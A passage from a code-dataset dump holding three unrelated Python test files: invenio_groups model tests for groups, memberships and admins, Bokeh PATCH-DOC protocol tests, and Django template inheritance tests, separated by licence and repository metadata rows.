def test_update_duplicated_names(self):
"""."""
from invenio_groups.models import Group
g = Group.create(name="test")
Group.create(name="test-change")
self.assertEqual(Group.query.count(), 2)
self.assertRaises(
IntegrityError,
g.update, name="test-change")
def test_get_by_name(self):
"""Test get by name."""
from invenio_groups.models import Group
Group.create(name="test1")
Group.create(name="test2")
self.assertEqual(Group.get_by_name("test1").name, "test1")
self.assertIsNone(Group.get_by_name("invalid"),)
def test_query_by_names(self):
"""Test query by names."""
from invenio_groups.models import Group
from flask.ext.sqlalchemy import BaseQuery
Group.create(name="test1")
Group.create(name="test2")
Group.create(name="test3")
self.assertRaises(
AssertionError,
Group.query_by_names, 'test1')
self.assertIsInstance(Group.query_by_names(['test']), BaseQuery)
self.assertEqual(Group.query_by_names(["invalid"]).count(), 0)
self.assertEqual(Group.query_by_names(["test1"]).count(), 1)
self.assertEqual(Group.query_by_names(["test2", "invalid"]).count(), 1)
self.assertEqual(Group.query_by_names(["test1", "test2"]).count(), 2)
self.assertEqual(Group.query_by_names([]).count(), 0)
def test_query_by_user(self):
"""."""
from invenio_groups.models import Group, Membership, \
GroupAdmin, MembershipState
from invenio_accounts.models import User
u1 = User(email="test1@test1.test1", password="test1")
u2 = User(email="test2@test2.test2", password="test2")
u3 = User(email="test3@test3.test3", password="test3")
db.session.add(u1)
db.session.add(u2)
db.session.add(u3)
db.session.commit()
g1 = Group.create(name="test1", admins=[u1])
g2 = Group.create(name="test2", admins=[u1])
g1.add_member(u2, state=MembershipState.PENDING_ADMIN)
g1.add_member(u3, state=MembershipState.ACTIVE)
g2.add_member(u2, state=MembershipState.ACTIVE)
self.assertEqual(Group.query.count(), 2)
self.assertEqual(GroupAdmin.query.count(), 2)
self.assertEqual(Membership.query.count(), 3)
self.assertEqual(Group.query_by_user(u1).count(), 2)
self.assertEqual(Group.query_by_user(u1, with_pending=True).count(), 2)
self.assertEqual(Group.query_by_user(u2).count(), 1)
self.assertEqual(Group.query_by_user(u2, with_pending=True).count(), 2)
self.assertEqual(Group.query_by_user(u3).count(), 1)
self.assertEqual(Group.query_by_user(u3, with_pending=True).count(), 1)
self.assertEqual(Group.query_by_user(
u3, with_pending=True, eager=[Group.members]).count(), 1)
def test_add_admin(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
a = Group.create(name="admin")
g = Group.create(name="test")
obj = g.add_admin(a)
self.assertIsInstance(obj, GroupAdmin)
self.assertEqual(GroupAdmin.query.count(), 1)
self.assertRaises(
IntegrityError,
g.add_admin, a)
def test_remove_admin(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
a = Group.create(name="admin")
g = Group.create(name="test", admins=[a])
self.assertEqual(GroupAdmin.query.count(), 1)
g.remove_admin(a)
self.assertEqual(GroupAdmin.query.count(), 0)
self.assertRaises(
NoResultFound,
g.remove_admin, a)
def test_add_member(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test1")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
obj = g.add_member(u)
self.assertIsInstance(obj, Membership)
self.assertEqual(Group.query.count(), 1)
self.assertEqual(Membership.query.count(), 1)
self.assertRaises(
FlushError,
g.add_member, u)
def test_remove_member(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test1")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
g.add_member(u)
self.assertEqual(Membership.query.count(), 1)
g.remove_member(u)
self.assertEqual(Membership.query.count(), 0)
self.assertIsNone(g.remove_member(u))
def test_invite(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test", password="test")
u2 = User(email="test", password="test")
db.session.add(u)
db.session.add(u2)
db.session.commit()
m = g.invite(u)
self.assertEqual(Membership.query.count(), 1)
self.assertEqual(m.state, MembershipState.PENDING_USER)
a = Group.create(name="admin")
g2 = Group.create(name="test2", admins=[a])
self.assertIsNone(g2.invite(u2, admin=g))
m = g2.invite(u2, admin=a)
self.assertEqual(Membership.query.count(), 2)
self.assertEqual(m.state, MembershipState.PENDING_USER)
def test_subscribe(self):
"""."""
from invenio_groups.models import Group, SubscriptionPolicy, \
Membership, MembershipState
from invenio_accounts.models import User
g_o = Group.create(name="test_open",
subscription_policy=SubscriptionPolicy.OPEN)
g_a = Group.create(name="test_approval",
subscription_policy=SubscriptionPolicy.APPROVAL)
g_c = Group.create(name="test_closed",
subscription_policy=SubscriptionPolicy.CLOSED)
u = User(email="test", password="test")
db.session.add(u)
db.session.commit()
m_o = g_o.subscribe(u)
m_c = g_c.subscribe(u)
m_a = g_a.subscribe(u)
self.assertIsNone(m_c,)
self.assertEqual(m_a.state, MembershipState.PENDING_ADMIN)
self.assertEqual(m_o.state, MembershipState.ACTIVE)
self.assertEqual(Membership.query.count(), 2)
def test_is_admin(self):
"""."""
from invenio_groups.models import Group
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test", password="test")
db.session.add(u)
db.session.commit()
g.add_admin(u)
self.assertTrue(g.is_admin(u))
a = Group.create(name="admin")
g = Group.create(name="test2", admins=[a])
self.assertTrue(g.is_admin(a))
def test_is_member(self):
"""."""
from invenio_groups.models import Group
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test", password="test")
db.session.add(u)
db.session.commit()
g.add_member(u)
self.assertTrue(g.is_member(u))
class MembershipTestCase(BaseTestCase):
"""Test of membership data model."""
def test_create(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
m = Membership.create(g, u)
self.assertEqual(m.state, MembershipState.ACTIVE)
self.assertEqual(m.group.name, g.name)
self.assertEqual(m.user.id, u.id)
self.assertRaises(
FlushError,
Membership.create, g, u)
def test_delete(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
Membership.create(g, u)
self.assertEqual(Membership.query.count(), 1)
Membership.delete(g, u)
self.assertEqual(Membership.query.count(), 0)
self.assertIsNone(Membership.delete(g, u))
def test_get(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test")
db.session.add(u)
db.session.add(u2)
db.session.commit()
Membership.create(g, u)
m = Membership.get(g, u)
m2 = Membership.get(g, u2)
self.assertEqual(m.group.id, g.id)
self.assertEqual(m.user.id, u.id)
self.assertIsNone(m2)
def test_query_by_user(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
from flask.ext.sqlalchemy import BaseQuery
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test2")
db.session.add(u)
db.session.add(u2)
db.session.commit()
Membership.create(g, u, MembershipState.ACTIVE)
self.assertIsInstance(Membership.query_by_user(u), BaseQuery)
self.assertEqual(Membership.query_by_user(u).count(), 1)
self.assertEqual(Membership.query_by_user(u2).count(), 0)
def test_query_invitations(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
from flask.ext.sqlalchemy import BaseQuery
g = Group.create(name="test")
u1 = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test2")
u3 = User(email="test3@test3.test3", password="test3")
db.session.add_all([u1, u2, u3])
db.session.commit()
Membership.create(g, u1, MembershipState.ACTIVE)
Membership.create(g, u2, MembershipState.PENDING_USER)
Membership.create(g, u3, MembershipState.PENDING_ADMIN)
self.assertIsInstance(Membership.query_by_user(u1), BaseQuery)
self.assertEqual(Membership.query_invitations(u1).count(), 0)
self.assertEqual(Membership.query_invitations(u2).count(), 1)
self.assertEqual(Membership.query_invitations(u3).count(), 0)
def test_query_requests(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
from flask.ext.sqlalchemy import BaseQuery
a = User(email="admin@admin.admin", password="admin")
u1 = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test2")
db.session.add_all([a, u1, u2])
db.session.commit()
g = Group.create(name="test", admins=[a])
Membership.create(g, u1, MembershipState.PENDING_ADMIN)
Membership.create(g, u2, MembershipState.PENDING_USER)
self.assertIsInstance(Membership.query_requests(u1), BaseQuery)
self.assertEqual(Membership.query_requests(a).count(), 1)
ad = Group.create(name="admin")
g2 = Group.create(name="test2", admins=[ad])
u3 = User(email="test3@test3.test3", password="test3")
u4 = User(email="test4@test4.test4", password="test4")
u5 = User(email="test5@test5g.test5", password="test5")
db.session.add_all([u3, u4, u5])
db.session.commit()
Membership.create(ad, u3, MembershipState.ACTIVE)
Membership.create(g2, u4, MembershipState.PENDING_ADMIN)
Membership.create(g2, u5, MembershipState.PENDING_USER)
self.assertEqual(Membership.query_requests(u3).count(), 1)
def test_query_by_group(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
from flask.ext.sqlalchemy import BaseQuery
g = Group.create(name="test")
Group.create(name="test2")
u = User(email="test@test.test", password="test")
u2 = User(email="test2@test2.test2", password="test2")
db.session.add(u)
db.session.commit()
Membership.create(g, u, MembershipState.ACTIVE)
self.assertIsInstance(Membership.query_by_group(g), BaseQuery)
self.assertEqual(Membership.query_by_group(g).count(), 1)
self.assertEqual(Membership.query_by_group(u2).count(), 0)
def test_accept(self):
"""."""
from invenio_groups.models import Group, Membership, \
MembershipState
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
m = Membership.create(g, u, MembershipState.PENDING_ADMIN)
m.accept()
self.assertEqual(m.state, MembershipState.ACTIVE)
def test_reject(self):
"""."""
from invenio_groups.models import Group, Membership
from invenio_accounts.models import User
g = Group.create(name="test")
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
m = Membership.create(g, u)
m.reject()
self.assertEqual(Membership.query.count(), 0)
class GroupAdminTestCase(BaseTestCase):
"""Test of GroupAdmin data model."""
def test_create(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
a = Group.create(name="admin")
g = Group.create(name="test")
ga = GroupAdmin.create(g, a)
self.assertEqual(ga.admin_type, 'Group')
self.assertEqual(ga.admin_id, a.id)
self.assertEqual(ga.group.id, g.id)
self.assertEqual(GroupAdmin.query.count(), 1)
def test_delete(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
a = Group.create(name="admin")
g = Group.create(name="test")
ga = GroupAdmin.create(g, a)
self.assertEqual(ga.admin_type, 'Group')
self.assertEqual(ga.admin_id, a.id)
self.assertEqual(ga.group.id, g.id)
self.assertEqual(GroupAdmin.query.count(), 1)
GroupAdmin.delete(g, a)
self.assertEqual(GroupAdmin.query.count(), 0)
def test_query_by_group(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
from flask.ext.sqlalchemy import BaseQuery
a = Group.create(name="admin")
g = Group.create(name="test", admins=[a])
g2 = Group.create(name="test2")
self.assertIsInstance(GroupAdmin.query_by_group(g), BaseQuery)
self.assertEqual(GroupAdmin.query_by_group(g).count(), 1)
self.assertEqual(GroupAdmin.query_by_group(g2).count(), 0)
def test_query_by_admin(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
from flask.ext.sqlalchemy import BaseQuery
a = Group.create(name="admin")
g = Group.create(name="test", admins=[a])
self.assertIsInstance(GroupAdmin.query_by_admin(a), BaseQuery)
self.assertEqual(GroupAdmin.query_by_admin(a).count(), 1)
self.assertEqual(GroupAdmin.query_by_admin(g).count(), 0)
def test_query_admins_by_group_ids(self):
"""."""
from invenio_groups.models import Group, GroupAdmin
from sqlalchemy.orm.query import Query
a = Group.create(name="admin")
g = Group.create(name="test", admins=[a])
self.assertIsInstance(GroupAdmin.query_admins_by_group_ids([g.id]),
Query)
self.assertEqual(
GroupAdmin.query_admins_by_group_ids([g.id]).count(), 1)
self.assertEqual(
GroupAdmin.query_admins_by_group_ids([a.id]).count(), 0)
self.assertRaises(
AssertionError,
GroupAdmin.query_admins_by_group_ids, 'invalid')
TEST_SUITE = make_test_suite(
SubscriptionPolicyTestCase, PrivacyPolicyTestCase, GroupTestCase,
MembershipTestCase)
if __name__ == "__main__":
run_test_suite(TEST_SUITE)
| gpl-2.0 |
rs2/bokeh | bokeh/protocol/messages/tests/test_patch_doc.py | 4 | 8320 | from __future__ import absolute_import, print_function
import unittest
from json import loads
import pytest
import numpy as np
from bokeh.protocol.messages.patch_doc import process_document_events
import bokeh.document as document
from bokeh.model import Model
from bokeh.models.sources import ColumnDataSource
from bokeh.core.properties import Int, Instance
from bokeh.protocol import Protocol
from bokeh.document.events import ColumnDataChangedEvent, ColumnsPatchedEvent, ColumnsStreamedEvent, ModelChangedEvent, RootAddedEvent, RootRemovedEvent
class AnotherModelInTestPatchDoc(Model):
bar = Int(1)
class SomeModelInTestPatchDoc(Model):
foo = Int(2)
child = Instance(Model)
class TestPatchDocument(unittest.TestCase):
def _sample_doc(self):
doc = document.Document()
another = AnotherModelInTestPatchDoc()
doc.add_root(SomeModelInTestPatchDoc(child=another))
doc.add_root(SomeModelInTestPatchDoc())
return doc
def test_create_no_events(self):
with pytest.raises(ValueError):
Protocol("1.0").create("PATCH-DOC", [])
def test_create_multiple_docs(self):
sample1 = self._sample_doc()
obj1 = next(iter(sample1.roots))
event1 = ModelChangedEvent(sample1, obj1, 'foo', obj1.foo, 42, 42)
sample2 = self._sample_doc()
obj2 = next(iter(sample2.roots))
event2 = ModelChangedEvent(sample2, obj2, 'foo', obj2.foo, 42, 42)
with pytest.raises(ValueError):
Protocol("1.0").create("PATCH-DOC", [event1, event2])
def test_create_model_changed(self):
sample = self._sample_doc()
obj = next(iter(sample.roots))
event = ModelChangedEvent(sample, obj, 'foo', obj.foo, 42, 42)
Protocol("1.0").create("PATCH-DOC", [event])
def test_create_then_apply_model_changed(self):
sample = self._sample_doc()
foos = []
for r in sample.roots:
foos.append(r.foo)
assert foos == [ 2, 2 ]
obj = next(iter(sample.roots))
assert obj.foo == 2
event = ModelChangedEvent(sample, obj, 'foo', obj.foo, 42, 42)
msg = Protocol("1.0").create("PATCH-DOC", [event])
copy = document.Document.from_json_string(sample.to_json_string())
msg.apply_to_document(copy)
foos = []
for r in copy.roots:
foos.append(r.foo)
foos.sort()
assert foos == [ 2, 42 ]
def test_patch_event_contains_setter(self):
sample = self._sample_doc()
root = None
other_root = None
for r in sample.roots:
if r.child is not None:
root = r
else:
other_root = r
assert root is not None
assert other_root is not None
new_child = AnotherModelInTestPatchDoc(bar=56)
cds = ColumnDataSource(data={'a': np.array([0., 1., 2.])})
sample.add_root(cds)
mock_session = object()
def sample_document_callback_assert(event):
"""Asserts that setter is correctly set on event"""
assert event.setter is mock_session
sample.on_change(sample_document_callback_assert)
# Model property changed
event = ModelChangedEvent(sample, root, 'child', root.child, new_child, new_child)
msg = Protocol("1.0").create("PATCH-DOC", [event])
msg.apply_to_document(sample, mock_session)
self.assertEqual(msg.buffers, [])
# RootAdded
event2 = RootAddedEvent(sample, root)
msg2 = Protocol("1.0").create("PATCH-DOC", [event2])
msg2.apply_to_document(sample, mock_session)
self.assertEqual(msg2.buffers, [])
# RootRemoved
event3 = RootRemovedEvent(sample, root)
msg3 = Protocol("1.0").create("PATCH-DOC", [event3])
msg3.apply_to_document(sample, mock_session)
self.assertEqual(msg3.buffers, [])
# ColumnsStreamed
event4 = ModelChangedEvent(sample, cds, 'data', 10, None, None,
hint=ColumnsStreamedEvent(sample, cds, {"a": [3]}, None, mock_session))
msg4 = Protocol("1.0").create("PATCH-DOC", [event4])
msg4.apply_to_document(sample, mock_session)
self.assertEqual(msg4.buffers, [])
# ColumnsPatched
event5 = ModelChangedEvent(sample, cds, 'data', 10, None, None,
hint=ColumnsPatchedEvent(sample, cds, {"a": [(0, 11)]}))
msg5 = Protocol("1.0").create("PATCH-DOC", [event5])
msg5.apply_to_document(sample, mock_session)
self.assertEqual(msg5.buffers, [])
# ColumnDataChanged, use_buffers=False
event6 = ModelChangedEvent(sample, cds, 'data', {'a': np.array([0., 1.])}, None, None,
hint=ColumnDataChangedEvent(sample, cds))
msg6 = Protocol("1.0").create("PATCH-DOC", [event6], use_buffers=False)
msg6.apply_to_document(sample, mock_session)
self.assertEqual(msg6.buffers, [])
print(cds.data)
# ColumnDataChanged, use_buffers=True
event7 = ModelChangedEvent(sample, cds, 'data', {'a': np.array([0., 1.])}, None, None,
hint=ColumnDataChangedEvent(sample, cds))
msg7 = Protocol("1.0").create("PATCH-DOC", [event7])
# can't test apply, doc not set up to *receive* binary buffers
# msg7.apply_to_document(sample, mock_session)
self.assertEqual(len(msg7.buffers), 1)
buf = msg7.buffers.pop()
self.assertEqual(len(buf), 2)
self.assertTrue(isinstance(buf[0], dict))
self.assertTrue(list(buf[0]) == ['id'])
# reports CDS buffer *as it is* Normally events called by setter and
# value in local object would have been already mutated.
self.assertEqual(buf[1], np.array([11., 1., 2., 3]).tobytes())
class _Event(object):
def __init__(self, refs, bufs):
self.refs=refs
self.bufs=bufs
def generate(self, refs, bufs):
refs.update(self.refs)
if bufs is not None:
bufs.extend(self.bufs)
return "junk"
class _M(Model):
pass
def test_process_document_events_no_refs():
e = _Event([], [])
r, bufs = process_document_events([e])
assert bufs == []
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 0
assert len(json['events']) == 1
assert json['events'] == ['junk']
def test_process_document_events_with_refs():
e = _Event([_M(),_M()], [])
r, bufs = process_document_events([e])
assert bufs == []
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 2
assert len(json['events']) == 1
assert json['events'] == ['junk']
def test_process_document_events_no_buffers():
e = _Event([], [])
r, bufs = process_document_events([e])
assert bufs == []
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 0
assert len(json['events']) == 1
assert json['events'] == ['junk']
def test_process_document_events_with_buffers():
e = _Event([], [1,2])
r, bufs = process_document_events([e])
assert bufs == [1, 2]
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 0
assert len(json['events']) == 1
assert json['events'] == ['junk']
def test_process_document_events_mixed():
e1 = _Event([], [1,2])
e2 = _Event([_M(),_M(),_M()], [3,4, 5])
e3 = _Event([_M(),_M()], [])
r, bufs = process_document_events([e1, e2, e3])
assert bufs == [1, 2, 3, 4, 5]
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 5
assert len(json['events']) == 3
assert json['events'] == ['junk', 'junk', 'junk']
def test_process_document_events_with_buffers_and_use_buffers_false():
e = _Event([], [1,2])
r, bufs = process_document_events([e], use_buffers=False)
assert bufs == []
json = loads(r)
assert sorted(list(json)) == ['events', 'references']
assert len(json['references']) == 0
assert len(json['events']) == 1
assert json['events'] == ['junk']
| bsd-3-clause |
double-y/django | tests/template_tests/syntax_tests/test_extends.py | 86 | 15503 | from django.test import SimpleTestCase
from ..utils import setup
inheritance_templates = {
'inheritance01': "1{% block first %}&{% endblock %}3{% block second %}_{% endblock %}",
'inheritance02': "{% extends 'inheritance01' %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance03': "{% extends 'inheritance02' %}",
'inheritance04': "{% extends 'inheritance01' %}",
'inheritance05': "{% extends 'inheritance02' %}",
'inheritance06': "{% extends foo %}",
'inheritance07': "{% extends 'inheritance01' %}{% block second %}5{% endblock %}",
'inheritance08': "{% extends 'inheritance02' %}{% block second %}5{% endblock %}",
'inheritance09': "{% extends 'inheritance04' %}",
'inheritance10': "{% extends 'inheritance04' %} ",
'inheritance11': "{% extends 'inheritance04' %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance12': "{% extends 'inheritance07' %}{% block first %}2{% endblock %}",
'inheritance13': "{% extends 'inheritance02' %}"
"{% block first %}a{% endblock %}{% block second %}b{% endblock %}",
'inheritance14': "{% extends 'inheritance01' %}{% block newblock %}NO DISPLAY{% endblock %}",
'inheritance15': "{% extends 'inheritance01' %}"
"{% block first %}2{% block inner %}inner{% endblock %}{% endblock %}",
'inheritance16': "{% extends 'inheritance15' %}{% block inner %}out{% endblock %}",
'inheritance17': "{% load testtags %}{% block first %}1234{% endblock %}",
'inheritance18': "{% load testtags %}{% echo this that theother %}5678",
'inheritance19': "{% extends 'inheritance01' %}"
"{% block first %}{% load testtags %}{% echo 400 %}5678{% endblock %}",
'inheritance20': "{% extends 'inheritance01' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance21': "{% extends 'inheritance02' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance22': "{% extends 'inheritance04' %}{% block first %}{{ block.super }}a{% endblock %}",
'inheritance23': "{% extends 'inheritance20' %}{% block first %}{{ block.super }}b{% endblock %}",
'inheritance24': "{% extends context_template %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance25': "{% extends context_template.1 %}"
"{% block first %}2{% endblock %}{% block second %}4{% endblock %}",
'inheritance26': "no tags",
'inheritance27': "{% extends 'inheritance26' %}",
'inheritance 28': "{% block first %}!{% endblock %}",
'inheritance29': "{% extends 'inheritance 28' %}",
'inheritance30': "1{% if optional %}{% block opt %}2{% endblock %}{% endif %}3",
'inheritance31': "{% extends 'inheritance30' %}{% block opt %}two{% endblock %}",
'inheritance32': "{% extends 'inheritance30' %}{% block opt %}two{% endblock %}",
'inheritance33': "1{% ifequal optional 1 %}{% block opt %}2{% endblock %}{% endifequal %}3",
'inheritance34': "{% extends 'inheritance33' %}{% block opt %}two{% endblock %}",
'inheritance35': "{% extends 'inheritance33' %}{% block opt %}two{% endblock %}",
'inheritance36': "{% for n in numbers %}_{% block opt %}{{ n }}{% endblock %}{% endfor %}_",
'inheritance37': "{% extends 'inheritance36' %}{% block opt %}X{% endblock %}",
'inheritance38': "{% extends 'inheritance36' %}{% block opt %}X{% endblock %}",
'inheritance39': "{% extends 'inheritance30' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance40': "{% extends 'inheritance33' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance41': "{% extends 'inheritance36' %}{% block opt %}new{{ block.super }}{% endblock %}",
'inheritance42': "{% extends 'inheritance02'|cut:' ' %}",
}
class InheritanceTests(SimpleTestCase):
libraries = {'testtags': 'template_tests.templatetags.testtags'}
@setup(inheritance_templates)
def test_inheritance01(self):
"""
Standard template with no inheritance
"""
output = self.engine.render_to_string('inheritance01')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance02(self):
"""
Standard two-level inheritance
"""
output = self.engine.render_to_string('inheritance02')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance03(self):
"""
Three-level with no redefinitions on third level
"""
output = self.engine.render_to_string('inheritance03')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance04(self):
"""
Two-level with no redefinitions on second level
"""
output = self.engine.render_to_string('inheritance04')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance05(self):
"""
Two-level with double quotes instead of single quotes
"""
output = self.engine.render_to_string('inheritance05')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance06(self):
"""
Three-level with variable parent-template name
"""
output = self.engine.render_to_string('inheritance06', {'foo': 'inheritance02'})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance07(self):
"""
Two-level with one block defined, one block not defined
"""
output = self.engine.render_to_string('inheritance07')
self.assertEqual(output, '1&35')
@setup(inheritance_templates)
def test_inheritance08(self):
"""
Three-level with one block defined on this level, two blocks
defined next level
"""
output = self.engine.render_to_string('inheritance08')
self.assertEqual(output, '1235')
@setup(inheritance_templates)
def test_inheritance09(self):
"""
Three-level with second and third levels blank
"""
output = self.engine.render_to_string('inheritance09')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance10(self):
"""
Three-level with space NOT in a block -- should be ignored
"""
output = self.engine.render_to_string('inheritance10')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance11(self):
"""
Three-level with both blocks defined on this level, but none on
second level
"""
output = self.engine.render_to_string('inheritance11')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance12(self):
"""
Three-level with this level providing one and second level
providing the other
"""
output = self.engine.render_to_string('inheritance12')
self.assertEqual(output, '1235')
@setup(inheritance_templates)
def test_inheritance13(self):
"""
Three-level with this level overriding second level
"""
output = self.engine.render_to_string('inheritance13')
self.assertEqual(output, '1a3b')
@setup(inheritance_templates)
def test_inheritance14(self):
"""
A block defined only in a child template shouldn't be displayed
"""
output = self.engine.render_to_string('inheritance14')
self.assertEqual(output, '1&3_')
@setup(inheritance_templates)
def test_inheritance15(self):
"""
A block within another block
"""
output = self.engine.render_to_string('inheritance15')
self.assertEqual(output, '12inner3_')
@setup(inheritance_templates)
def test_inheritance16(self):
"""
A block within another block (level 2)
"""
output = self.engine.render_to_string('inheritance16')
self.assertEqual(output, '12out3_')
@setup(inheritance_templates)
def test_inheritance17(self):
"""
{% load %} tag (parent -- setup for exception04)
"""
output = self.engine.render_to_string('inheritance17')
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance18(self):
"""
{% load %} tag (standard usage, without inheritance)
"""
output = self.engine.render_to_string('inheritance18')
self.assertEqual(output, 'this that theother5678')
@setup(inheritance_templates)
def test_inheritance19(self):
"""
{% load %} tag (within a child template)
"""
output = self.engine.render_to_string('inheritance19')
self.assertEqual(output, '140056783_')
@setup(inheritance_templates)
def test_inheritance20(self):
"""
Two-level inheritance with {{ block.super }}
"""
output = self.engine.render_to_string('inheritance20')
self.assertEqual(output, '1&a3_')
@setup(inheritance_templates)
def test_inheritance21(self):
"""
Three-level inheritance with {{ block.super }} from parent
"""
output = self.engine.render_to_string('inheritance21')
self.assertEqual(output, '12a34')
@setup(inheritance_templates)
def test_inheritance22(self):
"""
Three-level inheritance with {{ block.super }} from grandparent
"""
output = self.engine.render_to_string('inheritance22')
self.assertEqual(output, '1&a3_')
@setup(inheritance_templates)
def test_inheritance23(self):
"""
Three-level inheritance with {{ block.super }} from parent and
grandparent
"""
output = self.engine.render_to_string('inheritance23')
self.assertEqual(output, '1&ab3_')
@setup(inheritance_templates)
def test_inheritance24(self):
"""
Inheritance from local context without use of template loader
"""
context_template = self.engine.from_string("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}")
output = self.engine.render_to_string('inheritance24', {'context_template': context_template})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance25(self):
"""
Inheritance from local context with variable parent template
"""
context_template = [
self.engine.from_string("Wrong"),
self.engine.from_string("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}"),
]
output = self.engine.render_to_string('inheritance25', {'context_template': context_template})
self.assertEqual(output, '1234')
@setup(inheritance_templates)
def test_inheritance26(self):
"""
Set up a base template to extend
"""
output = self.engine.render_to_string('inheritance26')
self.assertEqual(output, 'no tags')
@setup(inheritance_templates)
def test_inheritance27(self):
"""
Inheritance from a template that doesn't have any blocks
"""
output = self.engine.render_to_string('inheritance27')
self.assertEqual(output, 'no tags')
@setup(inheritance_templates)
def test_inheritance_28(self):
"""
Set up a base template with a space in it.
"""
output = self.engine.render_to_string('inheritance 28')
self.assertEqual(output, '!')
@setup(inheritance_templates)
def test_inheritance29(self):
"""
Inheritance from a template with a space in its name should work.
"""
output = self.engine.render_to_string('inheritance29')
self.assertEqual(output, '!')
@setup(inheritance_templates)
def test_inheritance30(self):
"""
Base template, putting block in a conditional {% if %} tag
"""
output = self.engine.render_to_string('inheritance30', {'optional': True})
self.assertEqual(output, '123')
# Inherit from a template with block wrapped in an {% if %} tag
# (in parent), still gets overridden
@setup(inheritance_templates)
def test_inheritance31(self):
output = self.engine.render_to_string('inheritance31', {'optional': True})
self.assertEqual(output, '1two3')
@setup(inheritance_templates)
def test_inheritance32(self):
output = self.engine.render_to_string('inheritance32')
self.assertEqual(output, '13')
@setup(inheritance_templates)
def test_inheritance33(self):
"""
Base template, putting block in a conditional {% ifequal %} tag
"""
output = self.engine.render_to_string('inheritance33', {'optional': 1})
self.assertEqual(output, '123')
@setup(inheritance_templates)
def test_inheritance34(self):
"""
Inherit from a template with block wrapped in an {% ifequal %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance34', {'optional': 1})
self.assertEqual(output, '1two3')
@setup(inheritance_templates)
def test_inheritance35(self):
"""
Inherit from a template with block wrapped in an {% ifequal %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance35', {'optional': 2})
self.assertEqual(output, '13')
@setup(inheritance_templates)
def test_inheritance36(self):
"""
Base template, putting block in a {% for %} tag
"""
output = self.engine.render_to_string('inheritance36', {'numbers': '123'})
self.assertEqual(output, '_1_2_3_')
@setup(inheritance_templates)
def test_inheritance37(self):
"""
Inherit from a template with block wrapped in an {% for %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance37', {'numbers': '123'})
self.assertEqual(output, '_X_X_X_')
@setup(inheritance_templates)
def test_inheritance38(self):
"""
Inherit from a template with block wrapped in an {% for %} tag
(in parent), still gets overridden
"""
output = self.engine.render_to_string('inheritance38')
self.assertEqual(output, '_')
# The super block will still be found.
@setup(inheritance_templates)
def test_inheritance39(self):
output = self.engine.render_to_string('inheritance39', {'optional': True})
self.assertEqual(output, '1new23')
@setup(inheritance_templates)
def test_inheritance40(self):
output = self.engine.render_to_string('inheritance40', {'optional': 1})
self.assertEqual(output, '1new23')
@setup(inheritance_templates)
def test_inheritance41(self):
output = self.engine.render_to_string('inheritance41', {'numbers': '123'})
self.assertEqual(output, '_new1_new2_new3_')
